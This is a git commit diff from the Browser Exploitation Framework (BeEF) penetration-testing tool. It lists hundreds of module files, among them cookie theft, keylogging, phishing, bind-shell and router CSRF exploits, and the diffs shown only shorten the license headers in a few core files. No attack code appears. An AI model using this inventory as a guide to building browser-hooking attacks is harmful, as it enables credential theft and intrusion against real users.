 extensions/events/extension.rb                |   16 +-
 extensions/events/handler.rb                  |   16 +-
 extensions/ipec/config.yaml                   |   16 +-
 extensions/ipec/extension.rb                  |   16 +-
 extensions/ipec/junk_calculator.rb            |   16 +-
 extensions/ipec/models/ipec_exploits.rb       |   16 +-
 extensions/ipec/models/ipec_exploits_run.rb   |   16 +-
 extensions/ipec/rest/ipec.rb                  |   16 +-
 extensions/metasploit/api.rb                  |   16 +-
 extensions/metasploit/config.yaml             |   16 +-
 extensions/metasploit/extension.rb            |   16 +-
 extensions/metasploit/module.rb               |   16 +-
 extensions/metasploit/rpcclient.rb            |   16 +-
 extensions/notifications/channels/email.rb    |   16 +-
 extensions/notifications/channels/tweet.rb    |   16 +-
 extensions/notifications/config.yaml          |   16 +-
 extensions/notifications/extension.rb         |   16 +-
 extensions/proxy/api.rb                       |   16 +-
 extensions/proxy/config.yaml                  |   16 +-
 extensions/proxy/controllers/proxy.rb         |   16 +-
 extensions/proxy/extension.rb                 |   16 +-
 extensions/proxy/proxy.rb                     |   16 +-
 extensions/qrcode/config.yaml                 |   16 +-
 extensions/qrcode/extension.rb                |   16 +-
 extensions/qrcode/qrcode.rb                   |   16 +-
 extensions/requester/api.rb                   |   16 +-
 extensions/requester/api/hook.rb              |   16 +-
 extensions/requester/config.yaml              |   16 +-
 extensions/requester/controllers/requester.rb |   16 +-
 extensions/requester/extension.rb             |   16 +-
 extensions/requester/handler.rb               |   16 +-
 extensions/requester/models/http.rb           |   16 +-
 extensions/social_engineering/config.yaml     |   16 +-
 extensions/social_engineering/extension.rb    |   16 +-
 .../mass_mailer/mass_mailer.rb                |   16 +-
 .../social_engineering/models/interceptor.rb  |   16 +-
 .../social_engineering/models/mass_mailer.rb  |   16 +-
 .../social_engineering/models/web_cloner.rb   |   16 +-
 .../rest/socialengineering.rb                 |   16 +-
 .../web_cloner/interceptor.rb                 |   16 +-
 .../web_cloner/web_cloner.rb                  |   16 +-
 extensions/xssrays/api.rb                     |   16 +-
 extensions/xssrays/api/scan.rb                |   16 +-
 extensions/xssrays/config.yaml                |   16 +-
 extensions/xssrays/controllers/xssrays.rb     |   16 +-
 extensions/xssrays/extension.rb               |   16 +-
 extensions/xssrays/handler.rb                 |   16 +-
 extensions/xssrays/models/xssraysdetail.rb    |   16 +-
 extensions/xssrays/models/xssraysscan.rb      |   16 +-
 install                                       |   16 +-
 install-beef                                  |   16 +-
 .../browser/browser_fingerprinting/command.js |   17 +-
 .../browser_fingerprinting/config.yaml        |   16 +-
 .../browser/browser_fingerprinting/module.rb  |   16 +-
 modules/browser/detect_firebug/command.js     |   17 +-
 modules/browser/detect_firebug/config.yaml    |   16 +-
 modules/browser/detect_firebug/module.rb      |   16 +-
 .../browser/detect_popup_blocker/command.js   |   17 +-
 .../browser/detect_popup_blocker/config.yaml  |   16 +-
 .../browser/detect_popup_blocker/module.rb    |   16 +-
 .../browser/detect_unsafe_activex/command.js  |   17 +-
 .../browser/detect_unsafe_activex/config.yaml |   16 +-
 .../browser/detect_unsafe_activex/module.rb   |   16 +-
 .../browser/get_visited_domains/command.js    |   17 +-
 .../browser/get_visited_domains/config.yaml   |   16 +-
 modules/browser/get_visited_domains/module.rb |   16 +-
 modules/browser/get_visited_urls/command.js   |   17 +-
 modules/browser/get_visited_urls/config.yaml  |   16 +-
 modules/browser/get_visited_urls/module.rb    |   16 +-
 .../hooked_domain/ajax_fingerprint/command.js |   17 +-
 .../ajax_fingerprint/config.yaml              |   16 +-
 .../hooked_domain/alert_dialog/command.js     |   17 +-
 .../hooked_domain/alert_dialog/config.yaml    |   16 +-
 .../hooked_domain/alert_dialog/module.rb      |   16 +-
 .../hooked_domain/deface_web_page/command.js  |   17 +-
 .../hooked_domain/deface_web_page/config.yaml |   16 +-
 .../hooked_domain/deface_web_page/module.rb   |   16 +-
 .../hooked_domain/get_cookie/command.js       |   17 +-
 .../hooked_domain/get_cookie/config.yaml      |   16 +-
 .../hooked_domain/get_cookie/module.rb        |   16 +-
 .../get_local_storage/command.js              |   17 +-
 .../get_local_storage/config.yaml             |   16 +-
 .../hooked_domain/get_local_storage/module.rb |   16 +-
 .../hooked_domain/get_page_html/command.js    |   17 +-
 .../hooked_domain/get_page_html/config.yaml   |   16 +-
 .../hooked_domain/get_page_html/module.rb     |   16 +-
 .../hooked_domain/get_page_links/command.js   |   17 +-
 .../hooked_domain/get_page_links/config.yaml  |   16 +-
 .../hooked_domain/get_page_links/module.rb    |   16 +-
 .../get_session_storage/command.js            |   17 +-
 .../get_session_storage/config.yaml           |   16 +-
 .../get_session_storage/module.rb             |   16 +-
 .../get_stored_credentials/command.js         |   17 +-
 .../get_stored_credentials/config.yaml        |   16 +-
 .../get_stored_credentials/module.rb          |   16 +-
 .../hooked_domain/link_rewrite/command.js     |   17 +-
 .../hooked_domain/link_rewrite/config.yaml    |   16 +-
 .../hooked_domain/link_rewrite/module.rb      |   16 +-
 .../link_rewrite_sslstrip/command.js          |   17 +-
 .../link_rewrite_sslstrip/config.yaml         |   16 +-
 .../link_rewrite_sslstrip/module.rb           |   16 +-
 .../hooked_domain/link_rewrite_tel/command.js |   17 +-
 .../link_rewrite_tel/config.yaml              |   16 +-
 .../hooked_domain/link_rewrite_tel/module.rb  |   16 +-
 .../mobilesafari_address_spoofing/command.js  |   17 +-
 .../mobilesafari_address_spoofing/config.yaml |   16 +-
 .../mobilesafari_address_spoofing/module.rb   |   16 +-
 .../hooked_domain/prompt_dialog/command.js    |   17 +-
 .../hooked_domain/prompt_dialog/config.yaml   |   16 +-
 .../hooked_domain/prompt_dialog/module.rb     |   16 +-
 .../hooked_domain/replace_video/command.js    |   17 +-
 .../hooked_domain/replace_video/config.yaml   |   16 +-
 .../hooked_domain/replace_video/module.rb     |   16 +-
 .../browser/hooked_domain/rickroll/command.js |   17 +-
 .../hooked_domain/rickroll/config.yaml        |   16 +-
 .../browser/hooked_domain/rickroll/module.rb  |   16 +-
 .../hooked_domain/site_redirect/command.js    |   17 +-
 .../hooked_domain/site_redirect/config.yaml   |   16 +-
 .../hooked_domain/site_redirect/module.rb     |   16 +-
 .../site_redirect_iframe/command.js           |   17 +-
 .../site_redirect_iframe/config.yaml          |   16 +-
 .../site_redirect_iframe/module.rb            |   16 +-
 modules/browser/play_sound/command.js         |   17 +-
 modules/browser/play_sound/config.yaml        |   16 +-
 modules/browser/play_sound/module.rb          |   16 +-
 modules/browser/unhook/command.js             |   17 +-
 modules/browser/unhook/config.yaml            |   16 +-
 modules/browser/unhook/module.rb              |   16 +-
 modules/browser/webcam/command.js             |   17 +-
 modules/browser/webcam/config.yaml            |   16 +-
 modules/browser/webcam/module.rb              |   16 +-
 .../chrome_extensions/execute_tabs/command.js |   17 +-
 .../execute_tabs/config.yaml                  |   16 +-
 .../chrome_extensions/execute_tabs/module.rb  |   16 +-
 .../get_all_cookies/command.js                |   17 +-
 .../get_all_cookies/config.yaml               |   16 +-
 .../get_all_cookies/module.rb                 |   16 +-
 .../get_chrome_extensions/command.js          |   17 +-
 .../get_chrome_extensions/config.yaml         |   16 +-
 .../get_chrome_extensions/module.rb           |   16 +-
 .../grab_google_contacts/command.js           |   17 +-
 .../grab_google_contacts/config.yaml          |   16 +-
 .../grab_google_contacts/module.rb            |   16 +-
 .../chrome_extensions/inject_beef/command.js  |   17 +-
 .../chrome_extensions/inject_beef/config.yaml |   16 +-
 .../chrome_extensions/inject_beef/module.rb   |   16 +-
 .../chrome_extensions/screenshot/command.js   |   17 +-
 .../chrome_extensions/screenshot/config.yaml  |   16 +-
 .../chrome_extensions/screenshot/module.rb    |   16 +-
 .../send_gvoice_sms/command.js                |   17 +-
 .../send_gvoice_sms/config.yaml               |   16 +-
 .../send_gvoice_sms/module.rb                 |   16 +-
 modules/debug/test_network_request/command.js |   17 +-
 .../debug/test_network_request/config.yaml    |   16 +-
 modules/debug/test_network_request/module.rb  |   16 +-
 .../debug/test_return_ascii_chars/command.js  |   17 +-
 .../debug/test_return_ascii_chars/config.yaml |   16 +-
 .../debug/test_return_ascii_chars/module.rb   |   16 +-
 .../debug/test_return_long_string/command.js  |   17 +-
 .../debug/test_return_long_string/config.yaml |   16 +-
 .../debug/test_return_long_string/module.rb   |   16 +-
 .../axous_1_1_1_add_user_csrf/command.js      |   17 +-
 .../axous_1_1_1_add_user_csrf/config.yaml     |   16 +-
 .../axous_1_1_1_add_user_csrf/module.rb       |   16 +-
 .../beefbind/beef_bind_shell/command.js       |   17 +-
 .../beefbind/beef_bind_shell/config.yaml      |   16 +-
 .../beefbind/beef_bind_shell/module.rb        |   16 +-
 .../beef_bind_staged_deploy/command.js        |   17 +-
 .../beef_bind_staged_deploy/config.yaml       |   16 +-
 .../beef_bind_staged_deploy/module.rb         |   16 +-
 .../boastmachine_3_1_add_user_csrf/command.js |   17 +-
 .../config.yaml                               |   16 +-
 .../boastmachine_3_1_add_user_csrf/module.rb  |   16 +-
 .../camera/dlink_dcs_series_csrf/command.js   |   17 +-
 .../camera/dlink_dcs_series_csrf/config.yaml  |   16 +-
 .../camera/dlink_dcs_series_csrf/module.rb    |   16 +-
 .../command.js                                |   17 +-
 .../config.yaml                               |   16 +-
 .../module.rb                                 |   16 +-
 .../command.js                                |   17 +-
 .../config.yaml                               |   16 +-
 .../module.rb                                 |   16 +-
 .../glassfish_war_upload_xsrf/command.js      |   17 +-
 .../glassfish_war_upload_xsrf/config.yaml     |   16 +-
 .../glassfish_war_upload_xsrf/module.rb       |   16 +-
 .../jboss_jmx_upload_exploit/command.js       |   17 +-
 .../jboss_jmx_upload_exploit/config.yaml      |   16 +-
 .../jboss_jmx_upload_exploit/module.rb        |   16 +-
 .../activex_command_execution/command.js      |   17 +-
 .../activex_command_execution/config.yaml     |   16 +-
 .../activex_command_execution/module.rb       |   16 +-
 .../local_host/java_payload/command.js        |   17 +-
 .../local_host/java_payload/config.yaml       |   16 +-
 .../local_host/java_payload/module.rb         |   16 +-
 .../mozilla_nsiprocess_interface/command.js   |   17 +-
 .../mozilla_nsiprocess_interface/config.yaml  |   16 +-
 .../mozilla_nsiprocess_interface/module.rb    |   16 +-
 .../local_host/safari_launch_app/command.js   |   17 +-
 .../local_host/safari_launch_app/config.yaml  |   16 +-
 .../local_host/safari_launch_app/module.rb    |   16 +-
 .../window_mail_client_dos/command.js         |   17 +-
 .../window_mail_client_dos/config.yaml        |   16 +-
 .../window_mail_client_dos/module.rb          |   16 +-
 .../command.js                                |   17 +-
 .../config.yaml                               |   16 +-
 .../freenas_reverse_root_shell_csrf/module.rb |   16 +-
 .../qnx_qconn_command_execution/command.js    |   17 +-
 .../qnx_qconn_command_execution/config.yaml   |   16 +-
 .../qnx_qconn_command_execution/module.rb     |   16 +-
 .../3com_officeconnect_cmd_exec/command.js    |   17 +-
 .../3com_officeconnect_cmd_exec/config.yaml   |   16 +-
 .../3com_officeconnect_cmd_exec/module.rb     |   16 +-
 .../router/asmax_ar804gu_cmd_exec/command.js  |   17 +-
 .../router/asmax_ar804gu_cmd_exec/config.yaml |   16 +-
 .../router/asmax_ar804gu_cmd_exec/module.rb   |   16 +-
 .../router/bt_home_hub_csrf/command.js        |   17 +-
 .../router/bt_home_hub_csrf/config.yaml       |   16 +-
 .../router/bt_home_hub_csrf/module.rb         |   16 +-
 .../router/cisco_e2400_csrf/command.js        |   17 +-
 .../router/cisco_e2400_csrf/config.yaml       |   16 +-
 .../router/cisco_e2400_csrf/module.rb         |   16 +-
 .../router/comtrend_ct5367_csrf/command.js    |   17 +-
 .../router/comtrend_ct5367_csrf/config.yaml   |   16 +-
 .../router/comtrend_ct5367_csrf/module.rb     |   16 +-
 .../router/comtrend_ct5624_csrf/command.js    |   17 +-
 .../router/comtrend_ct5624_csrf/config.yaml   |   16 +-
 .../router/comtrend_ct5624_csrf/module.rb     |   16 +-
 .../router/dlink_dir_615_csrf/command.js      |   17 +-
 .../router/dlink_dir_615_csrf/config.yaml     |   16 +-
 .../router/dlink_dir_615_csrf/module.rb       |   16 +-
 .../router/dlink_dsl500t_csrf/command.js      |   17 +-
 .../router/dlink_dsl500t_csrf/config.yaml     |   16 +-
 .../router/dlink_dsl500t_csrf/module.rb       |   16 +-
 .../router/huawei_smartax_mt880/command.js    |   17 +-
 .../router/huawei_smartax_mt880/config.yaml   |   16 +-
 .../router/huawei_smartax_mt880/module.rb     |   16 +-
 .../router/linksys_befsr41_csrf/command.js    |   17 +-
 .../router/linksys_befsr41_csrf/config.yaml   |   16 +-
 .../router/linksys_befsr41_csrf/module.rb     |   16 +-
 .../router/linksys_wrt54g2_csrf/command.js    |   17 +-
 .../router/linksys_wrt54g2_csrf/config.yaml   |   16 +-
 .../router/linksys_wrt54g2_csrf/module.rb     |   16 +-
 .../router/linksys_wrt54g_csrf/command.js     |   17 +-
 .../router/linksys_wrt54g_csrf/config.yaml    |   16 +-
 .../router/linksys_wrt54g_csrf/module.rb      |   16 +-
 .../router/virgin_superhub_csrf/command.js    |   17 +-
 .../router/virgin_superhub_csrf/config.yaml   |   16 +-
 .../router/virgin_superhub_csrf/module.rb     |   16 +-
 .../spring_framework_malicious_jar/command.js |   17 +-
 .../config.yaml                               |   16 +-
 .../spring_framework_malicious_jar/module.rb  |   16 +-
 .../switch/netgear_gs108t_csrf/command.js     |   17 +-
 .../switch/netgear_gs108t_csrf/config.yaml    |   16 +-
 .../switch/netgear_gs108t_csrf/module.rb      |   16 +-
 .../vtiger_crm_upload_exploit/command.js      |   17 +-
 .../vtiger_crm_upload_exploit/config.yaml     |   16 +-
 .../vtiger_crm_upload_exploit/module.rb       |   16 +-
 .../xss/alienvault_ossim_3.1_xss/command.js   |   17 +-
 .../xss/alienvault_ossim_3.1_xss/config.yaml  |   16 +-
 .../xss/alienvault_ossim_3.1_xss/module.rb    |   16 +-
 .../command.js                                |   17 +-
 .../config.yaml                               |   16 +-
 .../module.rb                                 |   16 +-
 .../xss/serendipity_1.6_xss/command.js        |   17 +-
 .../xss/serendipity_1.6_xss/config.yaml       |   16 +-
 .../xss/serendipity_1.6_xss/module.rb         |   16 +-
 .../exploits/zenoss_add_user_csrf/command.js  |   17 +-
 .../exploits/zenoss_add_user_csrf/config.yaml |   16 +-
 .../exploits/zenoss_add_user_csrf/module.rb   |   16 +-
 .../exploits/zenoss_daemon_csrf/command.js    |   17 +-
 .../exploits/zenoss_daemon_csrf/config.yaml   |   16 +-
 modules/exploits/zenoss_daemon_csrf/module.rb |   16 +-
 modules/host/clipboard_theft/command.js       |   17 +-
 modules/host/clipboard_theft/config.yaml      |   16 +-
 modules/host/clipboard_theft/module.rb        |   16 +-
 modules/host/detect_cups/command.js           |   17 +-
 modules/host/detect_cups/config.yaml          |   16 +-
 modules/host/detect_cups/module.rb            |   16 +-
 modules/host/detect_google_desktop/command.js |   17 +-
 .../host/detect_google_desktop/config.yaml    |   16 +-
 modules/host/detect_google_desktop/module.rb  |   16 +-
 .../host/detect_protocol_handlers/command.js  |   17 +-
 .../host/detect_protocol_handlers/config.yaml |   16 +-
 .../host/detect_protocol_handlers/module.rb   |   16 +-
 modules/host/detect_software/command.js       |   17 +-
 modules/host/detect_software/config.yaml      |   16 +-
 modules/host/detect_software/module.rb        |   16 +-
 modules/host/get_internal_ip/command.js       |   17 +-
 modules/host/get_internal_ip/config.yaml      |   16 +-
 modules/host/get_internal_ip/module.rb        |   16 +-
 modules/host/get_registry_keys/command.js     |   17 +-
 modules/host/get_registry_keys/config.yaml    |   16 +-
 modules/host/get_registry_keys/module.rb      |   16 +-
 modules/host/get_system_info/command.js       |   17 +-
 modules/host/get_system_info/config.yaml      |   16 +-
 modules/host/get_system_info/module.rb        |   16 +-
 modules/host/get_wireless_keys/module.rb      |   16 +-
 modules/host/hook_default_browser/command.js  |   17 +-
 modules/host/hook_default_browser/config.yaml |   16 +-
 modules/host/hook_default_browser/module.rb   |   16 +-
 modules/host/insecure_url_skype/command.js    |   17 +-
 modules/host/insecure_url_skype/config.yaml   |   16 +-
 modules/host/insecure_url_skype/module.rb     |   16 +-
 modules/host/iphone_tel/command.js            |   17 +-
 modules/host/iphone_tel/config.yaml           |   16 +-
 modules/host/iphone_tel/module.rb             |   16 +-
 modules/host/physical_location/command.js     |   17 +-
 modules/host/physical_location/config.yaml    |   16 +-
 modules/host/physical_location/module.rb      |   16 +-
 modules/ipec/cross_site_printing/command.js   |   17 +-
 modules/ipec/cross_site_printing/config.yaml  |   16 +-
 modules/ipec/cross_site_printing/module.rb    |   16 +-
 modules/ipec/dns_tunnel/command.js            |   17 +-
 modules/ipec/dns_tunnel/config.yaml           |   16 +-
 modules/ipec/dns_tunnel/module.rb             |   16 +-
 modules/ipec/inter_protocol_imap/command.js   |   17 +-
 modules/ipec/inter_protocol_imap/config.yaml  |   16 +-
 modules/ipec/inter_protocol_imap/module.rb    |   16 +-
 modules/ipec/inter_protocol_irc/command.js    |   17 +-
 modules/ipec/inter_protocol_irc/config.yaml   |   16 +-
 modules/ipec/inter_protocol_irc/module.rb     |   16 +-
 .../inter_protocol_posix_bindshell/command.js |   17 +-
 .../config.yaml                               |   16 +-
 .../inter_protocol_posix_bindshell/module.rb  |   16 +-
 .../inter_protocol_win_bindshell/command.js   |   17 +-
 .../inter_protocol_win_bindshell/config.yaml  |   16 +-
 .../inter_protocol_win_bindshell/module.rb    |   16 +-
 modules/metasploit/browser_autopwn/command.js |   17 +-
 .../metasploit/browser_autopwn/config.yaml    |   16 +-
 modules/metasploit/browser_autopwn/module.rb  |   16 +-
 modules/misc/google_search/command.js         |   17 +-
 modules/misc/google_search/config.yaml        |   16 +-
 modules/misc/google_search/module.rb          |   16 +-
 modules/misc/iframe_keylogger/command.js      |   17 +-
 modules/misc/iframe_keylogger/config.yaml     |   16 +-
 modules/misc/iframe_keylogger/module.rb       |   16 +-
 modules/misc/iframe_sniffer/command.js        |   17 +-
 modules/misc/iframe_sniffer/config.yaml       |   16 +-
 modules/misc/iframe_sniffer/module.rb         |   16 +-
 modules/misc/invisible_iframe/command.js      |   17 +-
 modules/misc/invisible_iframe/config.yaml     |   16 +-
 modules/misc/invisible_iframe/module.rb       |   16 +-
 modules/misc/local_file_theft/command.js      |   17 +-
 modules/misc/local_file_theft/config.yaml     |   16 +-
 modules/misc/local_file_theft/module.rb       |   16 +-
 modules/misc/raw_javascript/command.js        |   57 +-
 modules/misc/raw_javascript/config.yaml       |   16 +-
 modules/misc/raw_javascript/module.rb         |   16 +-
 modules/network/detect_soc_nets/command.js    |   17 +-
 modules/network/detect_soc_nets/config.yaml   |   16 +-
 modules/network/detect_soc_nets/module.rb     |   16 +-
 modules/network/detect_tor/command.js         |   17 +-
 modules/network/detect_tor/config.yaml        |   16 +-
 modules/network/detect_tor/module.rb          |   16 +-
 modules/network/dns_enumeration/command.js    |   17 +-
 modules/network/dns_enumeration/config.yaml   |   16 +-
 modules/network/dns_enumeration/module.rb     |   16 +-
 .../command.js                                |   17 +-
 .../config.yaml                               |   16 +-
 .../internal_network_fingerprinting/module.rb |   16 +-
 modules/network/nat_pinning_irc/command.js    |   17 +-
 modules/network/nat_pinning_irc/config.yaml   |   16 +-
 modules/network/nat_pinning_irc/module.rb     |   16 +-
 modules/network/ping_sweep/command.js         |   17 +-
 modules/network/ping_sweep/config.yaml        |   16 +-
 modules/network/ping_sweep/module.rb          |   16 +-
 modules/network/ping_sweep_java/command.js    |   17 +-
 modules/network/ping_sweep_java/config.yaml   |   16 +-
 modules/network/ping_sweep_java/module.rb     |   16 +-
 modules/network/port_scanner/command.js       |   17 +-
 modules/network/port_scanner/config.yaml      |   16 +-
 modules/network/port_scanner/module.rb        |   16 +-
 .../persistence/confirm_close_tab/command.js  |   17 +-
 .../persistence/confirm_close_tab/config.yaml |   16 +-
 .../persistence/confirm_close_tab/module.rb   |   16 +-
 modules/persistence/iframe_above/command.js   |   17 +-
 modules/persistence/iframe_above/config.yaml  |   16 +-
 modules/persistence/iframe_above/module.rb    |   16 +-
 .../man_in_the_browser/config.yaml            |   16 +-
 .../persistence/man_in_the_browser/module.rb  |   16 +-
 .../persistence/popunder_window/command.js    |   17 +-
 .../persistence/popunder_window/config.yaml   |   16 +-
 modules/persistence/popunder_window/module.rb |   16 +-
 modules/phonegap/phonegap_beep/command.js     |   17 +-
 modules/phonegap/phonegap_beep/config.yaml    |   16 +-
 modules/phonegap/phonegap_beep/module.rb      |   16 +-
 .../phonegap_check_connection/config.yaml     |   16 +-
 .../phonegap_check_connection/module.rb       |   16 +-
 modules/phonegap/phonegap_detect/command.js   |   17 +-
 modules/phonegap/phonegap_detect/config.yaml  |   16 +-
 modules/phonegap/phonegap_detect/module.rb    |   16 +-
 .../phonegap/phonegap_file_upload/command.js  |   17 +-
 .../phonegap/phonegap_file_upload/config.yaml |   16 +-
 .../phonegap/phonegap_file_upload/module.rb   |   16 +-
 .../phonegap/phonegap_geo_locate/command.js   |   17 +-
 .../phonegap/phonegap_geo_locate/config.yaml  |   16 +-
 .../phonegap/phonegap_geo_locate/module.rb    |   16 +-
 .../phonegap/phonegap_list_files/command.js   |   17 +-
 .../phonegap/phonegap_list_files/config.yaml  |   16 +-
 .../phonegap/phonegap_list_files/module.rb    |   16 +-
 .../phonegap_persist_resume/config.yaml       |   16 +-
 .../phonegap_persist_resume/module.rb         |   16 +-
 .../phonegap/phonegap_persistence/command.js  |   17 +-
 .../phonegap/phonegap_persistence/config.yaml |   16 +-
 .../phonegap/phonegap_persistence/module.rb   |   16 +-
 .../phonegap_start_record_audio/command.js    |   17 +-
 .../phonegap_start_record_audio/config.yaml   |   16 +-
 .../phonegap_start_record_audio/module.rb     |   16 +-
 .../phonegap_stop_record_audio/command.js     |   17 +-
 .../phonegap_stop_record_audio/config.yaml    |   16 +-
 .../phonegap_stop_record_audio/module.rb      |   16 +-
 modules/social_engineering/clippy/command.js  |   17 +-
 modules/social_engineering/clippy/config.yaml |   16 +-
 modules/social_engineering/clippy/module.rb   |   16 +-
 .../fake_flash_update/command.js              |   17 +-
 .../fake_flash_update/config.yaml             |   16 +-
 .../fake_flash_update/module.rb               |   16 +-
 .../gmail_phishing/command.js                 |   17 +-
 .../gmail_phishing/config.yaml                |   16 +-
 .../gmail_phishing/module.rb                  |   16 +-
 .../lcamtuf_download/command.js               |   17 +-
 .../lcamtuf_download/config.yaml              |   16 +-
 .../lcamtuf_download/module.rb                |   16 +-
 .../pretty_theft/command.js                   |   17 +-
 .../pretty_theft/config.yaml                  |   16 +-
 .../social_engineering/pretty_theft/module.rb |   16 +-
 .../simple_hijacker/command.js                |   17 +-
 .../simple_hijacker/config.yaml               |   16 +-
 .../simple_hijacker/module.rb                 |   16 +-
 .../social_engineering/tabnabbing/command.js  |   17 +-
 .../social_engineering/tabnabbing/config.yaml |   16 +-
 .../social_engineering/tabnabbing/module.rb   |   16 +-
 test/common/ts_common.rb                      |   16 +-
 test/integration/ts_integration.rb            |   16 +-
 test/thirdparty/msf/unit/tc_metasploit.rb     |   16 +-
 test/thirdparty/msf/unit/ts_metasploit.rb     |   16 +-
 test/unit/core/filter/tc_base.rb              |   16 +-
 test/unit/core/filter/tc_command.rb           |   16 +-
 .../handlers/dynamicreconstruction.rb         |   16 +-
 test/unit/core/tc_api.rb                      |   16 +-
 test/unit/core/tc_autorun.rb                  |   16 +-
 test/unit/core/tc_bootstrap.rb                |   16 +-
 test/unit/core/tc_core.rb                     |   16 +-
 test/unit/core/tc_loader.rb                   |   16 +-
 test/unit/core/tc_logger.rb                   |   16 +-
 test/unit/core/tc_modules.rb                  |   16 +-
 test/unit/core/tc_obfuscation.rb              |   16 +-
 test/unit/core/tc_social_engineering.rb       |   16 +-
 test/unit/extensions/tc_event_logger.rb       |   16 +-
 test/unit/extensions/tc_hackverter.rb         |   16 +-
 test/unit/extensions/tc_hooks.rb              |   16 +-
 test/unit/extensions/tc_ipec_tunnel.rb        |   16 +-
 test/unit/extensions/tc_proxy.rb              |   16 +-
 test/unit/extensions/tc_requester.rb          |   16 +-
 test/unit/extensions/tc_vnc.rb                |   16 +-
 test/unit/extensions/tc_xssrays.rb            |   16 +-
 test/unit/tc_filesystem.rb                    |   16 +-
 test/unit/tc_grep.rb                          |   16 +-
 test/unit/ts_unit.rb                          |   16 +-
 update-beef                                   |   16 +-
 626 files changed, 3017 insertions(+), 9102 deletions(-)

diff --git a/Gemfile b/Gemfile
index 155418d9b..06cf6daff 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,19 +1,9 @@
 # BeEF's Gemfile
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Gems only required on Windows, or with specific Windows issues
diff --git a/Rakefile b/Rakefile
index adb1a8d14..d110ed104 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 task :default => ["quick"]
diff --git a/VERSION b/VERSION
index c01c6178d..93f3d13ce 100644
--- a/VERSION
+++ b/VERSION
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 0.4.3.8-alpha
diff --git a/beef b/beef
index 2a9672d46..b8a1abefe 100755
--- a/beef
+++ b/beef
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # stop deprecation warning from being displayed
diff --git a/config.yaml b/config.yaml
index b021a3a3b..c0e5d4ea0 100644
--- a/config.yaml
+++ b/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
diff --git a/core/api.rb b/core/api.rb
index 0d845d02d..162805b9f 100644
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/api/extension.rb b/core/api/extension.rb
index 1358e32d2..87121854c 100644
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
